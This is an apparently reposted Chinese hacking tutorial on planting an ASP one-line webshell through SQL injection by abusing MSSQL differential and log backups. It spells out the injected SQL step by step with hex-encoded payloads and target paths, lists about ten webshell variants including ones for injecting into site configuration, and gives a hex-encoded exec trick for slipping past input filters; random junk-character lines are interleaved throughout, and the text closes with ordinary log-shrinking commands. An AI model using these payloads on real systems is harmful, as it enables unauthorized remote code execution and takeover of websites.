MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
' {! y3 L. v' W$ J% Kbackup database 库名 to disk = 'c:\ddd.bak';--

; M6 B7 M  B% }- ~+ N9 H2.创建表并插曲入数据
2 y' G/ _4 y' Z+ fcreate table [dbo].[dtest] ([cmd] [image]);
7 r+ \" b/ @  s# g* Y/ h* D$ u! n0 |insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
4 _) `9 r) ?4 p9 ]
4 H' M; W* v# M3.进行差异备份
( W3 K1 w" I0 @; k0 K) Ibackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
* ]; Q; t9 w2 R$ _" K
  d9 i% q$ f7 z$ q& u上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
0 ^$ J  D, q. p( U# w& }
如下是网上常见的差异备份代码，思路一样！
===================================================
  j& G) J% S( g: W* l1 \利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
0 O) X9 Y/ ~" V0 ?: g8 ]" C
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
3 O( f7 C  R5 I# b3 ~3 ]
! V, X  l: ^8 M. ~, V2 ~+ Screate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
( V5 i  |# S3 e; X3 x$ r

6 o& m5 A1 C, H2 Z1 K/ Yinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

+ Y' M& Q5 D$ e: I- Qdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

" c1 o! Q* x& j+ hdrop table [xiaolu]  -- 删除此表。

9 g# R# [- y1 d  y% p* q0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
& V) w; g$ |( G6 ]2 ]& C
声明：方法不是我想的，我只是写工具，默认得到shell是
% ~6 P3 \& J9 b% N! u<%execute(request("a"))%>
===============================================================
% v% W8 [9 z! M9 U2 ^# [- C
我发现上面代码，有时会无效，而直接用

+ d& b0 o( J3 L6 J7 f+ z. {backup database 库名 to disk = 'c:\ddd.bak'

* W$ R+ g! ]' Q& C0 Ycreate table [dbo].[dtest] ([cmd] [image]);

7 p( ~7 C: C8 q: x! _  Zinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

7 Z% ^" K6 ?' G% `5 mbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
" @, ?0 S9 s" u" ~9 E8 G0 Y8 X
% p2 U  j- N4 i却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

! Z, J: a( V3 ^3 s; Y0 c3 B库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

  `: g% ?6 u" \网上还有log增量备份的，我也把他记录一下
% u% t4 @# M. T1 X/ B=====================================================
0 C! }. Z: a7 Q& n另一种log增量备份技术:

';alter database null set RECOVERY FULL--

7 U' r' h* K1 e9 @';create table cmd (a image)--

# C9 ?0 }1 X& P';backup log null to disk = 'f:\cmd' with init--

6 Q: f! h4 R& \+ w7 {';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--

';drop table cmd--
' `+ ?. t3 y, D1 Q
% j' N) O# m5 u; K';alter database XXX set RECOVERY SIMPLE--

# |7 E$ K# B3 z/ _PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：
6 g5 ~; d, E+ [" J
a)<%%25Execute(request("a"))%%25>
' q" G0 g% Q( |b)<%Execute(request("a"))%>
7 i! q$ U" U4 B! c! y$ h, L$ ac)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
8 ^* n1 y0 ^# t! W+ B! V0 Cf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
" K; e7 x6 b9 u. _g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
8 l7 J" L# r9 r% Y  n2 O, Zh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
: M, [2 O1 s: r; |3 N7 Z
8 \" [' o: K+ R' b  b# K7 K=============================================
! m, F+ _/ U% B' a: t
" K1 f( Y7 X  W; W% x$ P8 r/ y当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
2 c& D3 K0 ~3 R( u  Y! P" _
/ o0 x; P' y( z7 s) d) q把要执行的语句转16进制然后用exec执行
  s( B7 B$ s: q) R' l3 k

减少备份文件大小方法如下:
/ b$ V! I! W! U; b
总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
$ n4 a+ Z7 a6 r3 P1 {2
. u2 }" b9 i2 Y* }" s- N% F6 ^id=1;backup database model to disk='你的路径‘ with differential,format;--


4 C6 A8 j$ ]) p% a
SQL语句清理日志
3 V+ s# e  O9 T4 ?注：test为数据库名
2 |9 ^- }, R& j9 J7 W9 p5 G( t* a
--清空日志
DUMP TRANSACTION test WITH NO_LOG

/ x0 ?2 k' J, t; r  M- w--截断事务日志
7 g: U7 D  F4 b/ O" B, o3 {BACKUP LOG test WITH NO_LOG
* s: j% M1 `2 p) Q! W$ }- d- _: I
--收缩数据库
" k& @5 G* J0 n; d6 KDBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
4 s+ Y+ g" G$ t' I3 f) NSelect * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
& V$ `! \# ~3 S9 a" T" M& x6 VEXEC sp_dboption 'test', 'autoshrink', 'TRUE'